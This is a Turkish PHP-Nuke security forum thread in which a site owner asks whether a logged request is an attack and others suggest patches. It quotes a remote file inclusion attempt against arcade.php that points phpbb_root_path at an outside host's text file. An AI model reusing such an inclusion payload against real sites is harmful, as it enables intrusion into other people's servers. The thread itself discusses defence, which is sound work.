Anasayfa FORUMLAR Üye Girişi Dosyalar Dersler İpuçları Yardımcı Araçlar Hakkımızda
KİMLER BAĞLI
Toplam Üye: 32638
Aktif Üye: 0
Aktif Ziyaretçi: 1215
Üye Adı
Şifre
Beni Hatırla
          Yeni Üye KayıtYeni Üye Kayıt
          Şifremi UnuttumŞifremi Unuttum
FORUMLAR
 Nuke sentinelin sorgulama..
(5003 okuma, 0 yanıt)
 dizin CHMOD ları değişmiy..
(8263 okuma, 6 yanıt)
 3.3Patch Hakkında Versiyo..
(3486 okuma, 0 yanıt)
 nuke sentinel 2.6.01 kura..
(10224 okuma, 10 yanıt)
 Nuke Sentinel..
(4588 okuma, 2 yanıt)
 Nuke 8.0 Guvenlik..
(5129 okuma, 2 yanıt)
 Php Nuke 8.0 Güvenlik asa..
(3591 okuma, 0 yanıt)
 php nuke 8 kurdum güvenli..
(10588 okuma, 10 yanıt)
 Arkadaslar Lütfen Yardımc..
(9697 okuma, 9 yanıt)
 Site hacklendi sanırım.....
(5394 okuma, 2 yanıt)
 Hadi Protector Kuralım..
(42644 okuma, 45 yanıt)
 Bu bir saldırmı..
(8556 okuma, 7 yanıt)
 siteme virüs girmis..
(8636 okuma, 6 yanıt)
 Sitedekileri atmak..
(5483 okuma, 2 yanıt)
 Kötü botları engellemek...
(11667 okuma, 10 yanıt)
 2 dakika içinde 5 farklı ..
(7438 okuma, 5 yanıt)
 index atılamayan site yap..
(7372 okuma, 5 yanıt)
 Sanal Klavye Uygulamasi H..
(5563 okuma, 2 yanıt)
 js trojandownloader.agent..
(5964 okuma, 4 yanıt)
 Güvenlik konusunda yardım..
(7819 okuma, 8 yanıt)
 Sunucu firması websiteme ..
(5190 okuma, 2 yanıt)
 siteme saldirimi olmus?..
(6202 okuma, 4 yanıt)
 Protector bir işe yaramıy..
(14546 okuma, 15 yanıt)
 Nuke Sentinel 242 pl5 ( 7..
(27686 okuma, 25 yanıt)
 hacklendim mi?..
(6293 okuma, 4 yanıt)
 Güvenli prefix değiştirme..
(79779 okuma, 108 yanıt)
 7.6 ya 3.2 pack nasıl yap..
(4640 okuma, 1 yanıt)
 Site neden Google i banla..
(4356 okuma, 1 yanıt)
 PhpMyadminden toplu isim ..
(6497 okuma, 4 yanıt)
 sentinel güvenlik sistemi..
(7612 okuma, 6 yanıt)
 Sitemdeki Bu Acik Neyden ..
(7649 okuma, 6 yanıt)
 Saldırı yedim BW dolmuş. ..
(10317 okuma, 9 yanıt)
 sürümünüz < 7.8 ise s..
(7336 okuma, 5 yanıt)
 forum için kod yazma yasa..
(5177 okuma, 2 yanıt)
 Arkadaşlar hacklendim seb..
(4924 okuma, 2 yanıt)
 KENDİ TOLBARIMIMDAN AYDA ..
(5505 okuma, 3 yanıt)
 Bütün indexler değişmiş, ..
(5003 okuma, 3 yanıt)
 Çok sorulu, çok şıklı ank..
(3585 okuma, 0 yanıt)
 Protector' deki Host İs..
(3608 okuma, 0 yanıt)
 php nuke dosyaları şifrel..
(7893 okuma, 7 yanıt)
 index dosyasının chmod k..
(4231 okuma, 1 yanıt)
 AdminBox-1.0.3 Kurulumund..
(3782 okuma, 0 yanıt)
 gec saatlerde hızlanan tr..
(8225 okuma, 8 yanıt)
 Prefix değiştirmede coppe..
(4671 okuma, 1 yanıt)
 Nuke Güvenlik..
(166032 okuma, 257 yanıt)
 bütün index lere iframe e..
(19716 okuma, 24 yanıt)
 Nuke Sentinel Google bot ..
(5934 okuma, 4 yanıt)
 Siteme Sürekli Üye Oluyor..
(25622 okuma, 28 yanıt)
 Yeni iframe virüsler kodl..
(19899 okuma, 23 yanıt)
 Nuke Versiyonları Hakkın..
(3956 okuma, 0 yanıt)
Netopsiyon Online: Forums
Netopsiyon Online :: Başlık görüntüleniyor - 2 dakika içinde 5 farklı bölgedeki İP no banlandı,
 AramaArama   RütbelerRütbeliler   ProfilProfil   GirişGiriş 


2 dakika içinde 5 farklı bölgedeki İP no banlandı,

 
Bu forum kilitlendi: mesaj gönderemez, cevap yazamaz ya da başlıkları değiştiremezsiniz   Bu başlık kilitlendi: mesajları değiştiremez ya da cevap yazamazsınız    Netopsiyon Online Forum Ana Sayfa -> Php-Nuke -> Php Nuke Güvenlik
Önceki başlık :: Sonraki başlık  
Yazar Mesaj
Sergen
Mesaj: 200+
Mesaj: 200+





Kayıt: Mar 31, 2008
Mesajlar: 298

MesajTarih: 2010-02-20, 12:41:17    Mesaj konusu: 2 dakika içinde 5 farklı bölgedeki İP no banlandı, Alıntıyla Cevap Gönder

Sitemdeki Nuke Sentinel 2 dk içinde 5 farklı İp noyu banladı. İp nolara baktığımda hepsi farklı yabancı ülkeye ait
124.193.89.** : ÇİN
88.191.43.** : FRANSA
94.23.115.** : KİNGDOM
203.84.249.** : KORE
219.117.205.** JAPONYA
Sorgulama yapımında ise şu link bulunuyor.
www.siteismi. com/ modules.php?name=forums/arcade.php? phpbb_root_path=http://www. sinhvienqb.com/news/idbun1. txt
(linklerin arasını ayırdım)
Bu bir çeşit saldırımı oluyor?
Bilen arakadaşlardan yorum bekliyorum.

Forumlar dolaşırken şöyle bir şey buldum
Alıntı:
dün sitemde arcade.php üzerinden admin şifremi ele gecirmişler expolit çalıştırırak eğer sizinde powernuke kurulu siteniz varsa şu değişiklikleri mutalaka yapın:
Arcade.php , functions.php , functions_arcade.php de aşagıdaki kodu bulun;
Kod:
include($phpbb_root_pathve bu kodun basındakı " $ " harfini silin..


Yukarıdaki yazılanlarla alaksı var sanırım
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
Bu Site Google Adsense ile Gelir Elde Ediyor









Tarih: 2024-12-03, 17:16:37    Mesaj konusu: Forum Arası Reklamlar


Başa dön
seyranli
Mesaj: 1000+
Mesaj: 1000+





Kayıt: May 16, 2005
Mesajlar: 3511
Konum: oradan

MesajTarih: 2010-02-20, 13:42:55    Mesaj konusu: Alıntıyla Cevap Gönder

Tehlikeli birşey yapmaya çalışmamışlar. Bi nevi test yapmışlar.
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
Sergen
Mesaj: 200+
Mesaj: 200+





Kayıt: Mar 31, 2008
Mesajlar: 298

MesajTarih: 2010-02-20, 14:37:06    Mesaj konusu: Alıntıyla Cevap Gönder

Forumlarda Arcade oyunlarını zaten kullanmıyoruz. FTP den arcade.php dosyalarını silsek iyi olmaz mı?
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
seyranli
Mesaj: 1000+
Mesaj: 1000+





Kayıt: May 16, 2005
Mesajlar: 3511
Konum: oradan

MesajTarih: 2010-02-20, 18:18:44    Mesaj konusu: Alıntıyla Cevap Gönder

zararı olmaz silmenizin ama silmeye de gerek yok. arcade.php dosyasında <?php satırının bir altına $phpbb_root_path=''; eklemeniz bile yeterli
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
Bankocu
Editör
Editör





Kayıt: Jun 02, 2003
Mesajlar: 1842
Konum: Istanbul

MesajTarih: 2010-02-20, 19:16:26    Mesaj konusu: Alıntıyla Cevap Gönder

Aslında phpbb_root_path da aynı nuke prefixi gibi değiştirilmesi gereken sabit tanımlardan biri.
Nasıl ki bu tür standart saldırılar için nuke_ şeklindeki prefixi değiştirmek bir önlemse aynı şekilde phpbb_root_path da değiştirilmesi gereken bir şey.

Ama değiştirilmesi biraz daha zor olduğu için genelde kimse ilgilenmiyor.
Benim sitelerde phpbb_root_path yok örneğin. (Veritabanı içinde de, source dosyaları içinde de yok)
Yani yukarıdaki sorgu bu şekilde işlev göremeyecekti zaten.

Bir scriptin standart değerlerini ne kadar çok kullanırsanız, eline taş alan küçük çocukların o kadar kolay hedefi olursunuz.
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
seyranli
Mesaj: 1000+
Mesaj: 1000+





Kayıt: May 16, 2005
Mesajlar: 3511
Konum: oradan

MesajTarih: 2010-02-20, 23:06:55    Mesaj konusu: Alıntıyla Cevap Gönder

değişkenin değil, mantalitenin değiştirilmesi gerekiyor. register globals mantığı ile çalışmak güvenli birşey değil. $_GET['phpbb_root_path'] ile $phpbb_root_path aynı olmamalı. Tabi register global off olsa bu seferde mainfile import ediyor değişkenleri, dolayısıylada böyle riskli şeyler çıkıyor ortaya. O yüzden her değişkene bir ön tanım vermek şart oluyor. Bazı bloklarda bile benzer sorunlar var ama echo fonksiyonu kullanıldığından sayfa çıktısı ile anlık oynanabiliyo.
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
Önceki mesajları göster:   
Bu forum kilitlendi: mesaj gönderemez, cevap yazamaz ya da başlıkları değiştiremezsiniz   Bu başlık kilitlendi: mesajları değiştiremez ya da cevap yazamazsınız    Netopsiyon Online Forum Ana Sayfa -> Php-Nuke -> Php Nuke Güvenlik Tüm zamanlar GMT + 3 Saat
1. sayfa (Toplam 1 sayfa)

 
Geçiş Yap:  
Bu forumda yeni başlıklar açamazsınız
Bu forumdaki başlıklara cevap veremezsiniz
Bu forumdaki mesajlarınızı değiştiremezsiniz
Bu forumdaki mesajlarınızı silemezsiniz
Bu forumdaki anketlerde oy kullanamazsınız

Benzer Konular

Başlık Yazar Forum Cevaplar Tarih
Yeni mesaj yok VıdeolaR Orta Blogonunda Farklı Taray... cuneytsonmez Php Nuke Blocklar 3 2010-04-07, 23:02:49 Son Mesajı Görüntüle
Yeni mesaj yok tema genisliyor farklı tarayıcı ile ... cuneytsonmez Php Nuke Tema Paylaşımları 11 2010-03-28, 20:25:13 Son Mesajı Görüntüle
Yeni mesaj yok Wp- son dakika haberleri baska site y... kurtulus Wordpress Eklentileri 1 2010-03-25, 18:16:36 Son Mesajı Görüntüle
Yeni mesaj yok PHP-Nuke Haber V.1 'de en üstte kayan... hsengun1905 Php Nuke Sorunlarınız 11 2009-12-19, 02:42:33 Son Mesajı Görüntüle
Yeni mesaj yok Eklenti : Her block'a farklı görünüm ... efendymurat Php Nuke Blocklar 0 2009-10-29, 20:00:09 Son Mesajı Görüntüle

Copyright © 2002-2024 Netopsiyon Bilişim Teknolojileri San. Tic. Ltd.Şti. - Bütün hakları saklıdır!
Bu site Netopsiyon.com.tr Sunucularında Barındırılmaktadır.
Netopsiyon Bilişim Teknolojileri San. Tic. Ltd.Şti. Netopsiyon Copyright